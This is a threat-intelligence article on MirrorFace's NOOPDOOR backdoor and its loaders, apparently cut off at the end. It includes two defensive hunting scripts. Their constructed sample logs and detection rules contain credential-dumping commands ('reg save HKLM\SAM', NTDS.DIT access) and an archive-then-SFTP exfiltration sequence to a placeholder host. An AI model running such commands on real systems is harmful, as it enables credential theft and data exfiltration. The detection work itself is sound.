According to the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC), a threat group known as MirrorFace has been targeting media, political organizations, and academic institutions in Japan since 2022. More recently the group has expanded its targeting to manufacturers and research institutes, and its initial access has shifted from targeted phishing emails to exploitation of vulnerabilities in Array AG and FortiGate products.
After gaining a foothold in the network, the attackers deploy a backdoor known as NOOPDOOR together with various data-exfiltration tools. NOOPDOOR is shellcode that is injected into legitimate applications using one of two loader methods.
The first method launches NOOPDOOR from an XML file containing hidden code that is compiled and executed by MSBuild. This variant stores the encrypted payload in specific registry keys for later use.
The second method uses a DLL version of the loader, NOOPLDR, which is loaded into legitimate applications and hides its behaviour behind heavy code obfuscation. Both variants retrieve the encrypted payload from a file or from the registry and decrypt it with AES-CBC, using a key derived from system information.
NOOPLDR samples therefore come in two formats (XML and DLL) and are implanted into Windows processes differently. XML variants mainly rely on legitimate processes for execution and store the encrypted payload in the registry, while DLL variants show more complex behaviour, including service installation and hiding their registry data.
Some samples inject into processes such as wuauclt.exe, while others use lsass.exe, svchost.exe, and vdsldr.exe. DLL variants also apply Control Flow Flattening (CFF) to hinder analysis; to assist analysts, JPCERT/CC provides a Python script on GitHub.
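The XML delivery method relies on an MSBuild feature that is rarely needed in legitimate build scripts: an inline C# task compiled at run time. The following hunting script, an added example that is not JPCERT/CC's code, parses MSBuild project files and flags inline tasks, scoring them higher when the embedded code references the registry, base64 decoding or raw memory APIs. The sample project files are constructed for the example and contain no working payload; the token list is an assumption of what a triage analyst would look for, not a published signature.

```python
"""Hunt for MSBuild project files that carry inline code tasks.

Added example (not JPCERT/CC code).  An inline task is declared with
<UsingTask TaskFactory="CodeTaskFactory"|"RoslynCodeTaskFactory"> and a
<Code> element; MSBuild compiles and runs that code, which is the primitive
the XML loader variant abuses.  The SUSPICIOUS_TOKENS list is an assumed
triage heuristic, not a signature from the report.
"""
import re
import xml.etree.ElementTree as ET

INLINE_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}
# Strings that are unusual in a build script but typical of in-memory loaders.
SUSPICIOUS_TOKENS = ("DllImport", "kernel32", "ntdll", "VirtualAlloc",
                     "CreateThread", "OpenProcess", "Registry.",
                     "FromBase64String", "Rijndael", "AesManaged")


def local(tag):
    """Strip the MSBuild XML namespace so tags can be compared by name."""
    return tag.split("}", 1)[1] if "}" in tag else tag


def inspect_project(xml_text):
    """Return one finding per inline task found in an MSBuild project."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if local(el.tag) != "UsingTask":
            continue
        factory = el.get("TaskFactory", "")
        if factory not in INLINE_FACTORIES:
            continue  # a normal assembly-backed task, not inline code
        code = "".join(c.text or "" for c in el.iter() if local(c.tag) == "Code")
        hits = sorted(t for t in SUSPICIOUS_TOKENS if t in code)
        # A long base64 run inside build logic usually means an embedded blob.
        long_b64 = re.search(r"[A-Za-z0-9+/]{200,}={0,2}", code) is not None
        findings.append({
            "task": el.get("TaskName", "?"),
            "factory": factory,
            "tokens": hits,
            "long_base64": long_b64,
            "severity": "high" if hits or long_b64 else "review",
        })
    return findings


# Constructed sample: inline task that reads a registry blob and decodes it.
SUSPICIOUS_PROJECT = """
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Stage /></Target>
  <UsingTask TaskName="Stage" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Using Namespace="Microsoft.Win32" />
      <Code Type="Fragment" Language="cs"><![CDATA[
        // constructed sample body: pulls a blob from the registry and decodes it
        var blob = (string)Registry.GetValue(@"HKEY_CURRENT_USER\\Software\\Example", "Data", null);
        var raw = Convert.FromBase64String(blob);
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""

# Constructed sample: a harmless inline task that only logs a message.
BENIGN_INLINE_PROJECT = """
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <UsingTask TaskName="Hello" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.Core.dll">
    <Task><Code Type="Fragment" Language="cs">Log.LogMessage("hello");</Code></Task>
  </UsingTask>
</Project>
"""

# Constructed sample: an ordinary project with no inline task at all.
PLAIN_PROJECT = """
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Message Text="building" /></Target>
</Project>
"""

if __name__ == "__main__":
    for name, doc in [("suspicious", SUSPICIOUS_PROJECT),
                      ("benign-inline", BENIGN_INLINE_PROJECT),
                      ("plain", PLAIN_PROJECT)]:
        print(name, inspect_project(doc))
```

Running the script over a directory of `.xml`/`.proj` files found in user-writable locations, or over the file paths seen as arguments to MSBuild.exe in process-creation telemetry, turns the loader description above into a concrete triage step: any inline task outside a developer's build tree deserves a look, and one that touches the registry or decodes a blob deserves an immediate one.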
NOOPDOOR communicates over port 443 with servers chosen by a domain generation algorithm (DGA) and also receives commands on port 47000. Beyond standard functions such as file transfer and execution, NOOPDOOR can alter file timestamps, which complicates forensic investigation.
The attackers seek Windows domain credentials by dumping process memory, the NTDS.DIT database on domain controllers, and the sensitive registry hives (SYSTEM, SAM, SECURITY).
Once they hold administrator privileges in the Windows domain, the attackers distribute the malware via SMB and scheduled tasks, specifically targeting file servers, Active Directory, and antivirus management servers.
After gaining a foothold, the attackers perform reconnaissance with commands such as auditpol, bitsadmin, and dfsutil. They enumerate files with dir /S, focusing on OneDrive, Teams, IIS, and other services, then exfiltrate the data using WinRAR and SFTP.
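The post-compromise chain described above (reconnaissance commands, access to credential stores, the port 47000 command channel, and the dir /S, WinRAR, SFTP collection-and-exfiltration sequence) is mostly visible in ordinary process-creation and network-connection telemetry. The script below is an added example, not JPCERT/CC's tooling: it runs four correlation rules over a constructed, Sysmon-style event log. The log format, the time window and the tool lists are assumptions chosen for the example.

```python
"""Correlate process and network events for the MirrorFace post-compromise
chain.  Added example, not JPCERT/CC code.  Input lines are a constructed
pipe-delimited format: ts|host|kind|key=value;key=value ...
"""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

RECON_TOOLS = {"auditpol.exe", "bitsadmin.exe", "dfsutil.exe"}
ARCHIVERS = {"rar.exe", "winrar.exe"}
TRANSFER_TOOLS = {"sftp.exe", "psftp.exe", "winscp.exe"}
HIVES = (r"hklm\sam", r"hklm\system", r"hklm\security")
C2_PORT = 47000                  # secondary command port named in the report
WINDOW = timedelta(minutes=30)   # assumed correlation window


def parse_line(line):
    ts, host, kind, rest = line.split("|", 3)
    ev = {"ts": datetime.fromisoformat(ts), "host": host, "kind": kind}
    for kv in rest.split(";"):
        k, _, v = kv.partition("=")
        ev[k.strip()] = v.strip()
    return ev


def image(ev):
    return ntpath.basename(ev.get("image", "")).lower()


def is_credential_store_access(ev):
    cmd = ev.get("cmd", "").lower()
    if "ntds.dit" in cmd:
        return True
    return image(ev) == "reg.exe" and "save" in cmd and any(h in cmd for h in HIVES)


def is_recursive_dir(ev):
    cmd = ev.get("cmd", "").lower()
    return image(ev) == "cmd.exe" and re.search(r"\bdir\b.*\s/s\b", cmd) is not None


def alert(ev, rule, detail):
    return {"ts": ev["ts"].isoformat(), "host": ev["host"], "rule": rule, "detail": detail}


def triage(log_text):
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    alerts, by_host = [], defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
        ports = {int(ev.get("dport", 0)), int(ev.get("sport", 0))}
        if ev["kind"] == "network" and C2_PORT in ports:
            alerts.append(alert(ev, "c2_port", f"{image(ev)} using tcp/{C2_PORT}"))
        if ev["kind"] == "process" and is_credential_store_access(ev):
            alerts.append(alert(ev, "credential_store", ev["cmd"]))
    for host, evs in by_host.items():
        procs = [e for e in evs if e["kind"] == "process"]
        # Rule: two different recon tools on one host inside the window.
        recon = [e for e in procs if image(e) in RECON_TOOLS]
        for i, a in enumerate(recon):
            later = [b for b in recon[i + 1:]
                     if b["ts"] - a["ts"] <= WINDOW and image(b) != image(a)]
            if later:
                alerts.append(alert(a, "recon_burst", f"{image(a)} then {image(later[0])}"))
                break
        # Rule: recursive listing -> archiver -> transfer tool, each within the window.
        for d in (e for e in procs if is_recursive_dir(e)):
            arch = next((e for e in procs if image(e) in ARCHIVERS
                         and d["ts"] < e["ts"] <= d["ts"] + WINDOW), None)
            xfer = arch and next((e for e in procs if image(e) in TRANSFER_TOOLS
                                  and arch["ts"] < e["ts"] <= arch["ts"] + WINDOW), None)
            if xfer:
                alerts.append(alert(d, "collection_exfil_chain",
                                    f"dir /S -> {image(arch)} -> {image(xfer)}"))
                break
    return sorted(alerts, key=lambda a: a["ts"])


# Constructed sample log: one compromised host (WS01) and one quiet host (WS02).
SAMPLE_LOG = r"""
2024-07-02T09:00:00|WS01|process|image=C:\Windows\System32\auditpol.exe;cmd=auditpol /get /category:*
2024-07-02T09:03:00|WS01|process|image=C:\Windows\System32\bitsadmin.exe;cmd=bitsadmin /list /allusers
2024-07-02T09:05:00|WS01|network|image=C:\Windows\System32\svchost.exe;dst=198.51.100.7;dport=47000
2024-07-02T09:10:00|WS01|process|image=C:\Windows\System32\cmd.exe;cmd=cmd /c dir /S C:\Users\alice\OneDrive > C:\temp\list.txt
2024-07-02T09:20:00|WS01|process|image=C:\Program Files\WinRAR\Rar.exe;cmd=Rar.exe a -hp C:\temp\a.rar C:\Users\alice\OneDrive
2024-07-02T09:25:00|WS01|process|image=C:\Windows\System32\OpenSSH\sftp.exe;cmd=sftp user@203.0.113.9
2024-07-02T09:30:00|WS01|process|image=C:\Windows\System32\reg.exe;cmd=reg save HKLM\SAM C:\temp\sam.hiv
2024-07-02T10:00:00|WS02|process|image=C:\Windows\System32\notepad.exe;cmd=notepad.exe
"""

if __name__ == "__main__":
    for a in triage(SAMPLE_LOG):
        print(a)
```

Each rule on its own is noisy (administrators run auditpol, and SFTP is used legitimately), which is why the example correlates by host and time rather than alerting on single commands; the sequence of listing, archiving and transfer within a short window is what distinguishes collection for exfiltration from routine use. A production version would read real Sysmon or EDR events instead of the constructed format here.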
The sophisticated techniques used by MirrorFace show that cybersecurity is a dynamic process, not a static state. Organizations